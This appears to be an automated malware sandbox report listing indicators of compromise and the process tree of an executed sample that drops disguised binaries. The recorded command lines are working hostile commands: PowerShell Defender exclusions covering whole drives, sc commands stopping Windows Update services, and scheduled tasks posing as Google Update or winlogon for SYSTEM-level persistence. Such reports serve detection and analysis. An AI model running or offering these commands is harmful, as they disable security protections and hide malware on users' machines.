Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 4980 Conhost.exe 1552 Conhost.exe 2360 Conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4244 wrote to memory of 3088 4244 af4b66ff9b1f5830080860380efa81e4.exe 85 PID 4244 wrote to memory of 3088 4244 af4b66ff9b1f5830080860380efa81e4.exe 85 PID 4244 wrote to memory of 3088 4244 af4b66ff9b1f5830080860380efa81e4.exe 85 PID 4244 wrote to memory of 3448 4244 af4b66ff9b1f5830080860380efa81e4.exe 86 PID 4244 wrote to memory of 3448 4244 af4b66ff9b1f5830080860380efa81e4.exe 86 PID 3088 wrote to memory of 3144 3088 MpDefenderCoreService.exe 87 PID 3088 wrote to memory of 3144 3088 MpDefenderCoreService.exe 87 PID 3088 wrote to memory of 3144 3088 MpDefenderCoreService.exe 87 PID 2620 wrote to memory of 3120 2620 cmd.exe 92 PID 2620 wrote to memory of 3120 2620 cmd.exe 92 PID 2620 wrote to memory of 2800 2620 cmd.exe 93 PID 2620 wrote to memory of 2800 2620 cmd.exe 93 PID 2620 wrote to memory of 632 2620 cmd.exe 94 PID 2620 wrote to memory of 632 2620 cmd.exe 94 PID 2620 wrote to memory of 380 2620 cmd.exe 95 PID 2620 wrote to memory of 380 2620 cmd.exe 95 PID 2620 wrote to memory of 2128 2620 cmd.exe 96 PID 2620 wrote to memory of 2128 2620 cmd.exe 96 PID 3448 wrote to memory of 2652 3448 twain32.exe 99 PID 3060 wrote to memory of 1720 3060 cmd.exe 102 PID 3060 wrote to memory of 1720 3060 cmd.exe 102 PID 3060 wrote to memory of 1352 3060 cmd.exe 103 PID 3060 wrote to memory of 1352 3060 cmd.exe 103 PID 3060 wrote to memory of 3892 3060 cmd.exe 104 PID 3060 wrote to memory of 3892 3060 cmd.exe 104 PID 3060 wrote to memory of 924 3060 cmd.exe 105 PID 3060 wrote to memory of 924 3060 cmd.exe 105 PID 2652 wrote to memory of 612 2652 dialer.exe 5 PID 2652 wrote to memory of 684 2652 dialer.exe 7 PID 2652 wrote to memory of 960 2652 dialer.exe 12 PID 2652 wrote to memory of 316 2652 dialer.exe 13 PID 2652 wrote to memory of 412 2652 dialer.exe 14 PID 2652 wrote to memory of 1056 2652 dialer.exe 16 PID 2652 wrote to memory of 1064 2652 dialer.exe 17 PID 2652 wrote to memory of 1080 2652 dialer.exe 18 PID 2652 wrote to memory of 1192 2652 dialer.exe 19 PID 2652 wrote to memory of 1208 2652 dialer.exe 20 PID 2652 wrote to memory of 1292 2652 dialer.exe 21 PID 2652 wrote to memory of 1312 2652 dialer.exe 22 PID 2652 wrote to memory of 1384 2652 dialer.exe 23 PID 2652 wrote to memory of 1400 2652 dialer.exe 24 PID 2652 wrote to memory of 1468 2652 dialer.exe 25 PID 2652 wrote to memory of 1492 2652 dialer.exe 26 PID 2652 wrote to memory of 1512 2652 dialer.exe 27 PID 2652 wrote to memory of 1652 2652 dialer.exe 28 PID 2652 wrote to memory of 1696 2652 dialer.exe 29 PID 2652 wrote to memory of 1732 2652 dialer.exe 30 PID 2652 wrote to memory of 1808 2652 dialer.exe 31 PID 2652 wrote to memory of 1828 2652 dialer.exe 32 PID 2652 wrote to memory of 1932 2652 dialer.exe 33 PID 2652 wrote to memory of 1960 2652 dialer.exe 34 PID 2652 wrote to memory of 1968 2652 dialer.exe 35 PID 2652 wrote to memory of 2036 2652 dialer.exe 36 PID 2652 wrote to memory of 2060 2652 dialer.exe 37 PID 2652 wrote to memory of 2096 2652 dialer.exe 38 PID 2652 wrote to memory of 2216 2652 dialer.exe 40 PID 2652 wrote to memory of 2332 2652 dialer.exe 41 PID 2652 wrote to memory of 2492 2652 dialer.exe 42 PID 2652 wrote to memory of 2504 2652 dialer.exe 43 PID 2652 wrote to memory of 2672 2652 dialer.exe 44 PID 2652 wrote to memory of 2700 2652 dialer.exe 45 PID 2652 wrote to memory of 2724 2652 dialer.exe 46 PID 2652 wrote to memory of 2780 2652 dialer.exe 47 PID 2652 wrote to memory of 2792 2652 dialer.exe 48 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:612
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:316
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Drops file in System32 directory
PID:684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:412
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1056
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1064
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1080
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1192 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2940
-
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:3172
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1208
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1292
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1312
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1384
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1400
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1468
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2672
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1492
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1512
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1652
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1696
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1732
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1808
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1828
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1932
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1960
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1968
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2036
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2060
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2096
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2216
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2332
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2492
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2504
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2700
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2724
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2780
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2792
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2812
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2844
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2256
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3100
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3456
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3540
-
C:\Users\Admin\AppData\Local\Temp\af4b66ff9b1f5830080860380efa81e4.exe"C:\Users\Admin\AppData\Local\Temp\af4b66ff9b1f5830080860380efa81e4.exe"2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4244 -
C:\Users\Admin\AppData\Local\Temp\MpDefenderCoreService.exe"C:\Users\Admin\AppData\Local\Temp\MpDefenderCoreService.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3088 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\fontwin\n5YK.vbe"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:3144 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\fontwin\eUNvwPScHJBqRVxJMAbWN67h5pJ3FqxG.bat" "5⤵
- System Location Discovery: System Language Discovery
PID:2572 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
PID:4980
-
-
C:\fontwin\MsServerHost.exe"C:\fontwin/MsServerHost.exe"6⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Modifies registry class
PID:2888 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lkndfk0d\lkndfk0d.cmdline"7⤵
- Drops file in System32 directory
PID:1536 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Suspicious use of SetWindowsHookEx
PID:1552
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD3A.tmp" "c:\Windows\System32\CSC5E2D5D3AA49F40418C336E32307AFD6A.TMP"8⤵PID:1600
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:1992 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:5080
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:404 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:872
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:3984 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:3704
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/fontwin/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:4976 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:64
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:3248 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:1552
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:4052 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:1944
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:4376 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:3952
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:4260 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:784
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:1396 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:4992
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:764 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:4064
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:4564 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:1948
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:1348 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:2840
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\winlogon.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:4500 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:880
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Reference Assemblies\Microsoft\fontdrvhost.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:4984 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:1548
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Multimedia Platform\dllhost.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:3140 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:3048
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\MsServerHost.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:3284 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:1912
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Crashpad\reports\fontdrvhost.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2776 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:4848
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\fontwin\MsServerHost.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:4232 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:620
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\rqERLoI5WW.bat"7⤵PID:1600
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Suspicious use of SetWindowsHookEx
PID:2360
-
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:5716
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵PID:6104
-
-
C:\Program Files\Crashpad\reports\fontdrvhost.exe"C:\Program Files\Crashpad\reports\fontdrvhost.exe"8⤵
- Executes dropped EXE
PID:1592
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\twain32.exe"C:\Users\Admin\AppData\Local\Temp\twain32.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3448
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4700
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:2620 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:3120
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2800
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:632
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:380
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:2128
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1720
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1352
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3892
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:924
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2652
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xzibzypo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1420 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5056
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:3264
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2692
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4564 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2176
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:3780
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4428
-
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:552
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3588
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1368
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2252
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:4084
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
PID:624 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2320
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
PID:1760
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
PID:2408
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Power Settings
PID:4276
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Power Settings
PID:876
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:380
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xzibzypo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2776 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4440
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:1264
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
- Modifies data under HKEY_USERS
PID:220
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3644
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3832
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3996
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3956
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
PID:3756
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4524
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:2924
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:4040
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:3980
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2916
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4184
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3220
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:952
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4608
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:452
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2012
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Users\Public\winlogon.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2912
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Users\Public\winlogon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3448
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 6 /tr "'C:\Users\Public\winlogon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4340
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\fontdrvhost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1172
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2188
-
